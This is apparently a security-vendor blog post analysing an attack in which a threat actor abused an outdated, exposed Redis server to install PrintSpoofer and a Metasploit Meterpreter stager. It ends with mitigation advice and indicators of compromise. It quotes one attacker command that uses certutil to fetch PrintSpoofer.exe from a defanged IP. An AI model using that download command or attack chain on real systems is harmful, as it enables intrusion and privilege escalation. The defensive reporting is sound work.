Metasploit Meterpreter Installed via Redis Server

AhnLab SEcurity intelligence Center (ASEC) recently discovered that the Metasploit Meterpreter backdoor has been installed via the Redis service. Redis is an abbreviation of Remote Dictionary Server, which is an open-source in-memory data structure storage that is also used as a database. It is presumed that the threat actors abused inappropriate settings or ran commands through vulnerability attacks.

Redis is used for various purposes with the main ones being session management, message broker, and queues. As many systems all over the world use Redis, it is becoming a major target for threat actors. Malware installed through attacks against the vulnerable Redis service include Kinsing [1], P2PInfect [2], Skidmap [3], Migo [4], and HeadCrab [5].

Such malware strains attack Redis servers open to the public on the Internet with the authentication feature disabled. After gaining access to Redis, threat actors can install malware through known attack methods. One of the two main ones is registering the malware-executing command as a Cron task, and the other is using the SLAVEOF command to set the command as the Slave server of the Redis server that has the malware.

1. Attack Case

The targeted system used Windows unlike other known cases, and the version used in this attack was Redis 3.x, which is a version developed in 2016. As it is an old version, it was likely vulnerable to attacks that abuse misconfiguration or attacks on known vulnerabilities.

The threat actor first installed PrintSpoofer, a privilege escalation tool. PowerShell’s “invoke-webrequest” command was used for installation, and the tool was downloaded in the installation path for Redis.

Figure 1. Logs showing the threat actor attacking the Redis service to install PrintSpoofer

PrintSpoofer is a tool that abuses SeImpersonatePrivilege to escalate the user’s privileges. It is often used in attacks against vulnerable services that are not managed properly or have not been patched to the recent version, such as web servers that provide web services or database service providers like MS-SQL servers. As PrintSpoofer is available as open-source on GitHub, the threat actor built it themselves and also changed a certain string (“nilaina mana”) possibly to evade detection.

Figure 2. PrintSpoofer created using an open-source
  • PDB path: C:UsersdesignernembakDesktopTOOLSPrintSpoofer-masterx64DebugPrintSpoofer.pdb

Such attacks against the Redis service have been constantly found since the second half of last year. The difference between the cases from the past and the cases now is that PrintSpoofer is installed using the CertUtil tool instead of PowerShell.

  • Recently confirmed command: certutil -urlcache -split -f “hxxp://35.185.187[.]24/PrintSpoofer.exe” psf.exe

2. Metasploit Meterpreter

After installing PrintSpoofer, the threat actor installed Metasploit’s Stager malware.

Figure 3. Logs showing Metasploit Stager being installed

Metasploit is a penetration testing framework. It is a tool that can be used to inspect security vulnerabilities for networks and systems of companies and organizations, providing various features for each penetration test stage. Like Cobalt Strike, it provides features necessary for each stage, from creating various types of payloads for the initial infection and stealing account credentials to dominating the system via lateral movement.

Similar to Cobalt Strike’s Beacon, Meterpreter is a backdoor that is in charge of carrying out the actual malicious behaviors. Meterpreter can be divided into two types depending on the way it is installed: staged or stageless. The stageless method is where Meterpreter is included in the payload. As such, the malware size becomes bigger to a certain extent. The staged method is where the malware named “Stager” is used. When Stager is executed, Meterpreter is downloaded from the C&C server. With this method, Stager can be very small in terms of its size compared to Meterpreter.

The threat actor created Stager using a reverse TCP method to install it in the infected system. When Stager is executed, it connects to the C&C server to download the Meterpreter backdoor. When the process is complete, Meterpreter is executed in the memory, allowing the threat actor to take control over the infected system.

Figure 4. Meterpreter backdoor downloaded from the C&C server

3. Conclusion

Recently, Metasploit Meterpreter has been installed on externally exposed Redis servers. The Redis service targeted in these attacks was the version that was developed in 2016, which means that it can be a target of vulnerability attacks and likely not properly managed.

When Metasploit is installed, the threat actor can take control of the infected system and also dominate the internal network of an organization using the various features offered by the malware. Thus, security managers must patch the server so that it is up to date and practice prevention of known vulnerabilities being exploited. For externally open servers, protection software must be used to restrict external access. Also, V3 should be updated to the latest version so that malware infection can be prevented.

File Detection
– Trojan/Win32.Shell.R1283 (2010-12-17.00)
– Exploit/Win.PrintSpoofer.C5538254 (2023.11.06.03)
– Exploit/Win.PrintSpoofer.R358767 (2023.08.14.00)

Behavior Detection
– Malware/MDP.Download.M1197

IoC
MD5s

– cff64cc3e82aebd7a7e81f1633b5040e: Metasploit Stager (meteran.exe)
– dbdcbacbc74b139d914747690ebe0e1c: PrintSpoofer (PrintSpoofer.exe)
– b26b57b28e61f9320cc42d97428f3806: PrintSpoofer (ps.exe)

C&C Server
– 34.124.148[.]215:9070

Download URLs
– hxxp://35.185.187[.]24/PrintSpoofer.exe
– hxxp://35.185.187[.]24/ps.exe
– hxxp://35.185.187[.]24/meteran.exe

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Metasploit Meterpreter Installed via Redis Server appeared first on ASEC BLOG.